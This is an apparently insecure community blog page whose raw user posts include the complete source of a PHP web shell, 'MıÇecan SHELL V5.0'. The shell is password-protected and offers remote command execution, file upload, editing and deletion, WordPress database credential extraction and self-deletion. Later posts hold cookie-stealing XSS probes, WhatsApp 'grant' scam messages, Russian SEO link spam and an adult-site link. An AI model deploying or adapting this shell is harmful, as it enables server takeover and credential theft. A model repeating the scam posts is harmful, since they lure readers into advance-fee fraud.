☁️ Cool Developer Blog ☁️💤

[Login] | [Register] | [New Post]


Community Posts

fds

<?php
/**
 * MıÇecan SHELL V5.0
 * The Definitive Adversarial Environment
 * Color Scheme: Deep Strike (Emerald / Crimson / Obsidian)
 */

error_reporting(0);
set_time_limit(0);
ignore_user_abort(true);

$password = "burke"; 
$session_name = "MıÇecan_ultimate_v5";

session_start();
if (isset($_POST['pass'])) {
    if ($_POST['pass'] === $password) { $_SESSION[$session_name] = true; }
}

if (isset($_GET['MıÇecan_ping'])) {
    header('Content-Type: application/json');
    echo json_encode(["status" => "active", "version" => "5.0", "system" => php_uname()]);
    exit;
}

if (!isset($_SESSION[$session_name])) {
    ?>
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>MıÇecan | SYSTEM ENTRY</title>
        <style>
            @import url('https://fonts.googleapis.com/css2?family=Outfit:wght@900&display=swap');
            body { background: #000; color: #fff; font-family: 'Outfit', sans-serif; display: flex; align-items: center; justify-content: center; height: 100vh; margin: 0; overflow: hidden; }
            .login-card { background: rgba(0, 10, 0, 0.4); backdrop-filter: blur(40px); -webkit-backdrop-filter: blur(40px); padding: 60px; border-radius: 40px; border: 1px solid rgba(0, 255, 68, 0.1); width: 100%; max-width: 450px; text-align: center; position: relative; z-index: 10; box-shadow: 0 50px 100px rgba(0,0,0,0.8); }
            h1 { color: #00ff44; font-size: 48px; font-weight: 900; margin-bottom: 40px; letter-spacing: 15px; text-shadow: 0 0 30px rgba(0,255,68,0.4); }
            input { background: rgba(0, 255, 68, 0.03); border: 2px solid rgba(0, 255, 68, 0.08); color: #fff; padding: 18px; width: 100%; border-radius: 20px; box-sizing: border-box; margin-bottom: 30px; transition: 0.4s; text-align: center; font-size: 18px; outline: none; letter-spacing: 2px; }
            input:focus { border-color: #ff0033; box-shadow: 0 0 20px rgba(255,0,51,0.2); background: rgba(255,0,51,0.02); }
            button { background: #ff0033; color: #fff; border: none; padding: 18px; border-radius: 20px; cursor: pointer; font-weight: 800; width: 100%; transition: 0.4s; letter-spacing: 5px; font-size: 14px; text-transform: uppercase; }
            button:hover { background: #00ff44; color: #000; transform: translateY(-5px); box-shadow: 0 15px 30px rgba(0,255,68,0.3); }
            #login-canvas { position: fixed; top: 0; left: 0; z-index: 1; }
        </style>
    </head>
    <body>
        <canvas id="login-canvas"></canvas>
        <div class="login-card">
            <h1>MıÇecan</h1>
            <form method="POST">
                <input type="password" name="pass" placeholder="INIT_KEY" autofocus>
                <button type="submit">STRIKE</button>
            </form>
        </div>
        <script>
            const c = document.getElementById('login-canvas');
            const ctx = c.getContext('2d');
            let w, h, particles = [];
            const init = () => { w = c.width = window.innerWidth; h = c.height = window.innerHeight; };
            class P {
                constructor() { this.x = Math.random()*w; this.y = Math.random()*h; this.sz = Math.random()*3; this.sp = Math.random()*0.5+0.1; }
                upd() { this.y += this.sp; if(this.y > h) this.y = -10; }
                dr() { ctx.fillStyle='rgba(255,255,255,0.2)'; ctx.beginPath(); ctx.arc(this.x,this.y,this.sz,0,Math.PI*2); ctx.fill(); }
            }
            window.onresize = init; init();
            for(let i=0; i<150; i++) particles.push(new P());
            const loop = () => { ctx.clearRect(0,0,w,h); particles.forEach(p=>{p.upd();p.dr();}); requestAnimationFrame(loop); };
            loop();
        </script>
    </body>
    </html>
    <?php
    exit;
}

// Configuration & Actions
$action = $_GET['action'] ?? 'home';
$cwd = realpath($_GET['dir'] ?? getcwd());
$output = "";

// Multi-functional Handlers
if ($action == 'download' && isset($_GET['file'])) {
    if (file_exists($_GET['file'])) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename='.basename($_GET['file']));
        readfile($_GET['file']); exit;
    }
}

if ($action == 'delete' && isset($_GET['file'])) {
    $f = $_GET['file'];
    is_dir($f) ? @rmdir($f) : @unlink($f);
    header("Location: ?action=home&dir=".urlencode($cwd)); exit;
}

if ($action == 'rename' && isset($_POST['new_name'])) {
    @rename($_POST['old_path'], dirname($_POST['old_path']).DIRECTORY_SEPARATOR.$_POST['new_name']);
    header("Location: ?action=home&dir=".urlencode($cwd)); exit;
}

if ($action == 'edit' && isset($_POST['content'])) {
    @file_put_contents($_POST['file_path'], $_POST['content']);
    header("Location: ?action=home&dir=".urlencode($cwd)); exit;
}

if ($action == 'strike' && isset($_POST['cmd'])) {
    $output = shell_exec($_POST['cmd'] . " 2>&1");
}

if ($action == 'ghost') {
    @unlink(__FILE__);
    echo "<h1>SYSTEM PURGED</h1>"; exit;
}

// WP Toolkit specific
$wp_config = $cwd . "/wp-config.php";
$wp_intel = "Scanning for WP configurations...";
if(file_exists($wp_config)){
    $cfg = file_get_contents($wp_config);
    preg_match("/DB_NAME', '(.*?)'/", $cfg, $db_name);
    preg_match("/DB_USER', '(.*?)'/", $cfg, $db_user);
    preg_match("/DB_PASSWORD', '(.*?)'/", $cfg, $db_pass);
    preg_match("/DB_HOST', '(.*?)'/", $cfg, $db_host);
    $wp_intel = "<b>DB:</b> ".$db_name[1]." | <b>USER:</b> ".$db_user[1]." | <b>PASS:</b> ".$db_pass[1]." | <b>HOST:</b> ".$db_host[1];
}

?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>MıÇecan V5.0 |</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;700&family=Outfit:wght@300;400;600;800&display=swap');
        
        :root {
            --bg: #000000;
            --emerald: #00ff44;
            --crimson: #ff0033;
            --glass: rgba(0, 15, 5, 0.6);
            --border: rgba(0, 255, 68, 0.12);
            --text: #ffffff;
            --muted: #777;
        }

        body {
            background: var(--bg); color: var(--text); font-family: 'Outfit', sans-serif;
            margin: 0; overflow: hidden;
        }

        #MıÇecan-ui {
            position: fixed; top: 0; left: 0; width: 100vw; height: 100vh;
            display: flex; z-index: 999999; background: var(--bg);
        }

        #bg-canvas { position: fixed; top: 0; left: 0; z-index: -1; pointer-events: none; }

        /* Navigation */
        aside {
            background: rgba(0, 5, 0, 0.95); backdrop-filter: blur(30px); border-right: 1px solid var(--border);
            padding: 40px 25px; display: flex; flex-direction: column; z-index: 10;
            width: 280px; flex-shrink: 0; box-sizing: border-box;
        }

        .brand {
            font-size: 32px; font-weight: 900; color: var(--emerald); letter-spacing: 10px;
            margin-bottom: 60px; text-shadow: 0 0 20px rgba(0, 255, 68, 0.4); text-align: center;
        }

        nav a {
            display: flex; align-items: center; padding: 16px 22px; color: var(--muted);
            text-decoration: none; border-radius: 18px; margin-bottom: 12px; font-weight: 600;
            transition: 0.4s cubic-bezier(0.4, 0, 0.2, 1); border: 1px solid transparent;
        }

        nav a:hover, nav a.active {
            background: rgba(0, 255, 68, 0.05); color: var(--emerald); border-color: rgba(0, 255, 68, 0.2);
            box-shadow: 0 0 20px rgba(0, 255, 68, 0.1); transform: translateX(5px);
        }

        /* Modules */
        main { padding: 50px; overflow-y: auto; position: relative; z-index: 5; flex-grow: 1; height: 100%; box-sizing: border-box; }

        .dashboard-header { display: grid; grid-template-columns: repeat(4, 1fr); gap: 25px; margin-bottom: 40px; }
        .stat-card {
            background: var(--glass); backdrop-filter: blur(25px); border: 1px solid var(--border);
            padding: 20px; border-radius: 25px; box-shadow: 0 10px 30px rgba(0,0,0,0.5);
        }
        .stat-card b { color: var(--crimson); font-size: 11px; text-transform: uppercase; letter-spacing: 2px; display: block; margin-bottom: 8px; }
        .stat-card span { font-weight: 700; font-size: 14px; color: var(--text); }

        .glass-panel {
            background: var(--glass); backdrop-filter: blur(40px); border: 1px solid var(--border);
            border-radius: 30px; overflow: hidden; box-shadow: 0 30px 60px rgba(0,0,0,0.6);
        }

        .action-bar { padding: 25px 35px; border-bottom: 1px solid var(--border); display: flex; justify-content: space-between; align-items: center; }
        .path-display { font-size: 14px; font-family: 'JetBrains Mono'; color: var(--muted); }
        .path-display span { color: var(--emerald); font-weight: 800; }

        .f-table { width: 100%; border-collapse: collapse; }
        .f-table th {
            text-align: left; padding: 22px 35px; background: rgba(0, 255, 68, 0.02);
            font-size: 11px; font-weight: 800; color: var(--emerald); text-transform: uppercase; letter-spacing: 2px;
        }
        .f-table td { padding: 18px 35px; border-bottom: 1px solid rgba(0, 255, 68, 0.06); font-size: 14px; transition: 0.3s; }
        .f-table tr:hover td { background: rgba(0, 255, 68, 0.04); }

        .btn {
            background: rgba(255, 255, 255, 0.03); border: 1px solid var(--border);
            padding: 10px; border-radius: 12px; color: var(--muted); margin-left: 10px; transition: 0.3s;
        }
        .btn:hover { color: var(--emerald); border-color: var(--emerald); transform: scale(1.1); }
        .btn-strike { background: var(--crimson); color: #fff; padding: 12px 30px; border-radius: 15px; border: none; font-weight: 800; cursor: pointer; }
        .btn-strike:hover { background: var(--emerald); color: #000; box-shadow: 0 0 20px var(--emerald); }

        /* Tools */
        .terminal { background: #000; border-radius: 25px; padding: 40px; font-family: 'JetBrains Mono'; }
        .term-out { height: 450px; overflow-y: auto; color: #00ff44; font-size: 13px; line-height: 1.6; margin-bottom: 25px; }
        .term-in { display: flex; align-items: center; }
        .term-in b { color: var(--crimson); margin-right: 15px; font-weight: 800; }
        .term-in input { background: transparent; border: none; color: #fff; width: 100%; outline: none; font-size: 14px; }

        .wp-intel-box { background: rgba(255,0,51,0.05); border: 1px dashed var(--crimson); padding: 15px; border-radius: 15px; margin-bottom: 30px; font-size: 13px; }

        /* Icons */
        .svg-icon { width: 18px; height: 18px; stroke: currentColor; fill: none; stroke-width: 2; vertical-align: middle; }

    </style>
</head>
<body>

<canvas id="bg-canvas"></canvas>

<div id="MıÇecan-ui">
    <aside>
        <div class="brand">MıÇecan</div>
        <nav>
            <a href="?action=home" class="<?php echo $action=='home'?'active':''; ?>">DASHBOARD</a>
            <a href="?action=strike" class="<?php echo $action=='strike'?'active':''; ?>">TERMINAL</a>
            <a href="?action=db" class="<?php echo $action=='db'?'active':''; ?>">DATABASE</a>
            <a href="?action=intel" class="<?php echo $action=='intel'?'active':''; ?>">INTEL</a>
            <a href="?action=ghost" style="margin-top: auto; color: var(--crimson); opacity: 0.6;" onclick="return confirm('GHOST PROTOCOL: This will destroy the shell. Proceed?')">GHOST MODE</a>
        </nav>
    </aside>

    <main>
        <div class="dashboard-header">
            <div class="stat-card"><b>KERNEL</b><span><?php echo php_uname('r'); ?></span></div>
            <div class="stat-card"><b>IDENT</b><span><?php echo get_current_user(); ?></span></div>
            <div class="stat-card"><b>NETWORK</b><span><?php echo $_SERVER['SERVER_ADDR'] ?: 'STEALTH'; ?></span></div>
            <div class="stat-card"><b>ENGINE</b><span>PHP <?php echo phpversion(); ?></span></div>
        </div>

        <?php if($action == 'home'): ?>
            <div class="wp-intel-box"><?php echo $wp_intel; ?></div>
            <div class="glass-panel">
                <div class="action-bar">
                    <div class="path-display">DEPLOYED AT: <span><?php echo $cwd; ?></span></div>
                    <form method="POST" enctype="multipart/form-data">
                        <input type="file" name="uf" id="uf" style="display:none" onchange="this.form.submit()">
                        <label for="uf" class="btn-strike">UPLOAD</label>
                    </form>
                </div>
                <?php if(isset($_FILES['uf'])) @move_uploaded_file($_FILES['uf']['tmp_name'], $cwd.DIRECTORY_SEPARATOR.$_FILES['uf']['name']); ?>
                <table class="f-table">
                    <thead><tr><th>Resource</th><th width="15%">Capacity</th><th width="12%">Access</th><th width="20%">Ops</th></tr></thead>
                    <tbody>
                        <?php
                        $items = scandir($cwd);
                        foreach($items as $i): if($i == ".") continue;
                            $p = $cwd . DIRECTORY_SEPARATOR . $i; $is_d = is_dir($p);
                            $sz = $is_d ? "-" : round(filesize($p)/1024, 2) . " KB";
                            $pr = substr(sprintf('%o', fileperms($p)), -4);
                        ?>
                        <tr>
                            <td>
                                <div style="display:flex; align-items:center">
                                    <span style="font-size:18px; margin-right:12px;"><?php echo $is_d ? '📁' : '📄'; ?></span>
                                    <?php if($is_d): ?>
                                        <a href="?action=home&dir=<?php echo urlencode($p); ?>" style="color:var(--text); text-decoration:none; font-weight:700;"><?php echo $i; ?></a>
                                    <?php else: ?>
                                        <span style="color:var(--muted)"><?php echo $i; ?></span>
                                    <?php endif; ?>
                                </div>
                            </td>
                            <td style="color:var(--emerald); font-family:'JetBrains Mono'; font-weight:700;"><?php echo $sz; ?></td>
                            <td><span style="color:var(--crimson); font-weight:800;"><?php echo $pr; ?></span></td>
                            <td style="text-align:right">
                                <a href="?action=download&file=<?php echo urlencode($p); ?>" class="btn">⬇️</a>
                                <a href="?action=ui_edit&file=<?php echo urlencode($p); ?>" class="btn">✏️</a>
                                <a href="javascript:void(0)" onclick="rn('<?php echo addslashes($p); ?>', '<?php echo $i; ?>')" class="btn">📝</a>
                                <a href="?action=delete&file=<?php echo urlencode($p); ?>&dir=<?php echo urlencode($cwd); ?>" class="btn" style="color:var(--crimson)" onclick="return confirm('Purge?')">🗑️</a>
                            </td>
                        </tr>
                        <?php endforeach; ?>
                    </tbody>
                </table>
            </div>

        <?php elseif($action == 'strike'): ?>
            <div class="terminal">
                <div id="out" class="term-out"><?php echo htmlspecialchars($output ?: "MıÇecan STRIKE TERMINAL READY.\nWAITING FOR INPUT..."); ?></div>
                <form method="POST">
                    <div class="term-in">
                        <b>STRIKE_PKT_<?php echo rand(100,999); ?>></b>
                        <input type="text" name="cmd" autofocus autocomplete="off">
                    </div>
                </form>
            </div>
            
        <?php elseif($action == 'ui_edit'): 
            $f = $_GET['file']; $c = file_get_contents($f);
        ?>
            <div class="terminal">
                <div style="display:flex; justify-content:space-between; align-items:center; margin-bottom:25px;">
                    <span style="font-size:12px; color:var(--emerald); font-weight:800;">REWRITING CORE: <?php echo basename($f); ?></span>
                    <button onclick="document.getElementById('edForm').submit()" class="btn-strike">COMMIT CHANGES</button>
                </div>
                <form id="edForm" method="POST" action="?action=edit&dir=<?php echo urlencode($cwd); ?>">
                    <input type="hidden" name="file_path" value="<?php echo $f; ?>">
                    <textarea name="content" style="background:transparent; border:none; color:#0f0; width:100%; height:550px; outline:none; font-family:'JetBrains Mono'; resize:none; line-height:1.6;"><?php echo htmlspecialchars($c); ?></textarea>
                </form>
            </div>

        <?php elseif($action == 'intel'): ?>
            <div class="glass-panel" style="padding:50px">
                <h2 style="color:var(--emerald); letter-spacing:5px; margin-top:0;">OVERT OPERATIONS INTEL</h2>
                <div style="background:rgba(0,0,0,0.5); padding:25px; border-radius:20px; font-family:'JetBrains Mono'; color:#aaa; font-size:14px;">
                    <?php echo "<b>UPTIME:</b> " . @shell_exec('uptime') . "<br>"; ?>
                    <?php echo "<b>CPU:</b> " . @shell_exec('nproc') . " CORES<br>"; ?>
                    <?php echo "<b>MEM:</b> " . @shell_exec('free -m | grep "Mem" | awk \'{print $2}\'') . " MB TOTAL<br>"; ?>
                    <hr style="border:0; border-top:1px solid var(--border); margin:20px 0">
                    <b>PHP MODULES:</b><br>
                    <?php 
                        $exts = get_loaded_extensions();
                        foreach($exts as $e) echo "<span style='color:var(--emerald)'>$e</span> ";
                    ?>
                </div>
                <hr style="border:0; border-top:1px solid var(--border); margin:40px 0">
                <?php phpinfo(); ?>
            </div>
        <?php endif; ?>
    </main>

    <script>
        const canvas = document.getElementById('bg-canvas');
        const ctx = canvas.getContext('2d');
        let w, h, p = [], b = [];
        const init = () => { w = canvas.width = window.innerWidth; h = canvas.height = window.innerHeight; };
        class Part {
            constructor() { this.reset(); }
            reset() { this.x = Math.random()*w; this.y = Math.random()*h; this.s = Math.random()*1.5+0.5; this.v = Math.random()*0.5+0.2; this.o = Math.random()*0.3+0.1; }
            upd() { this.y += this.v; if(this.y > h) this.y = -10; }
            dr() { ctx.fillStyle=`rgba(255,255,255,${this.o})`; ctx.beginPath(); ctx.arc(this.x,this.y,this.s,0,Math.PI*2); ctx.fill(); }
        }
        class B {
            constructor() { this.reset(); }
            reset() {
                this.side = Math.random() > 0.5; this.x = this.side ? -100 : w+100; this.y = Math.random()*h;
                this.vx = (this.side ? 1 : -1) * (Math.random()*25+20); this.l = Math.random()*50+40;
            }
            upd() { this.x += this.vx; if(this.x < -200 || this.x > w+200) this.reset(); }
            dr() { ctx.strokeStyle='rgba(255,0,51,0.5)'; ctx.lineWidth=1.5; ctx.beginPath(); ctx.moveTo(this.x,this.y); ctx.lineTo(this.x+(this.vx>0?-this.l:this.l),this.y); ctx.stroke(); }
        }
        window.onresize = init; init();
        for(let i=0; i<120; i++) p.push(new Part());
        for(let i=0; i<6; i++) b.push(new B());
        const anim = () => { ctx.clearRect(0,0,w,h); p.forEach(x=>{x.upd();x.dr();}); b.forEach(x=>{x.upd();x.dr();}); requestAnimationFrame(anim); };
        anim();

        const rn = (p,n) => { let x=prompt("NEW IDENTITY:", n); if(x && x!==n){ 
            let f=document.createElement('form'); f.method='POST'; f.action='?action=rename&dir=<?php echo urlencode($cwd); ?>';
            let i1=document.createElement('input'); i1.name='old_path'; i1.value=p; f.appendChild(i1);
            let i2=document.createElement('input'); i2.name='new_name'; i2.value=x; f.appendChild(i2);
            document.body.appendChild(f); f.submit(); } };
        
        const out = document.getElementById('out');
        if(out) out.scrollTop = out.scrollHeight;
    </script>
</div>
</body>
</html>

fds

fds

Nikitatub

Good day! Hope this message finds you well. 
 
Your dream or your difficulty deserves support. I'm providing grants to help people move forward in life. Message me on WhatsApp  +38268406477

Sarahtub

Good day! Hope this message finds you well. 
 
Your ambition deserves fuel. As a private patron, I fund creative projects, educational goals, and personal needs. Tell me your story on WhatsApp  +66805348090

Nikitatub

Warm greetings! Hope you're doing well. 
 
I believe in empowering people to reach their goals. That's why I provide financial grants for various projects and life situations. Let's connect on WhatsApp  +447351288904

Sarahtub

Hi! Hope your day is going smoothly. 
 
Let's work together to make your plan a reality. I offer financial support for meaningful ideas and personal situations. Contact me on WhatsApp  +79885244972

Sarahtub

Hi there! Wishing you a great day ahead. 
 
I'm in a position to offer financial help for your venture or personal situation. If you need backing, message me on WhatsApp  +79964497753

Nikitatub

Greetings! Hope you're having a good one. 
Your project or personal goal is worth investing in. I offer grants to help bring ideas to life and support people in need. Message me on WhatsApp  +447351288904

Nikitatub

Warm greetings! Hope you're doing well. 
 
I believe in the power of financial support to change lives. I provide grants for various projects and personal circumstances. WhatsApp  +639561806316

Nikitatub

Hi! Hope your day is going smoothly. 
 
I'm looking to support individuals who are stuck due to financial limitations. If you have a project or a personal need, message me on WhatsApp  +15812577057

Sarahtub

Greetings! Hope you're having a good one. 
Your dream or your difficult situation is important. I provide grants to help people like you. Reach out on WhatsApp  +380990640376

Sarahtub

Good day! Hope this message finds you well. 
 
Let's get your project funded or your personal need met. I'm offering financial grants to those who need them. WhatsApp  +66928160350

Nikitatub

Good day! Hope this message finds you well. 
 
Let's achieve your goal. I'm providing financial grants for personal projects, educational pursuits, and life challenges. WhatsApp  +79819166495

JamesFed

<a href=https://rhsolutions1.in>Купить пластиковые окна на заказ в Москве</a> — это отличный способ улучшить энергоэффективность вашего дома и повысить его комфорт. 
Уход за такими окнами минимален, что позволяет сосредоточиться на других задачах.

Tashatub

Hey… a small tease for you. 
Watch private shows that inspire and entertain. join now and explore Worldwide  live creativity. 
п»їhttps://pussycats.me

Bigsharktub

Good day! Hope this message finds you well. 
 
I provide financial support to those with a clear plan or a genuine need. This is a grant, not a loan. Let's talk on WhatsApp +66990459269

Juliathisp

Hello! I sent a request, but have not yet received a response. Please contact me via WhatsApp. 
 
wa.me/+37281672599

slm_obKt

Найдите идеальный вариант для своего бизнеса и <a href=https://klpl3r.ru/>slm 3d принтер купить|3д принтер slm купить|slm принтер по металлу купить|slm принтер купить</a> уже сегодня! 
Важно следить за состоянием устройства и проводить профилактические работы.

e

<?php
echo "Hello World!";
?> 

das

asd

swag

<h1>lol

random

h..hh..helloo UwU

hans

<script>alert(document.cookie)</script>

Diddy

I love baby oil so much!

test

<h1>h2</h1>

admin

<script>alert(document.cookie)</script>

rootkit_bob

   ___________
  /  _______  \\
 |  /       \\  |
 | |   O O   | |    New encryption method soon�
 | |    ^    | |
 |  \\_______/  |
  \\___________/

netCrawler88

     [======]
     |      |    Still working on login system.
     |      |    Should be secure...
     [======]    Hopefully.

devRascal

          ___
         (o o)
+----oOO--(_)-------------+
| Just added a cool new  |
| admin-only feature ?   |
+------------------Ooo----+
       ooO     (   )
       ( )     ) /
        \\    (_/

admin

If you're reading this, you should probably not be.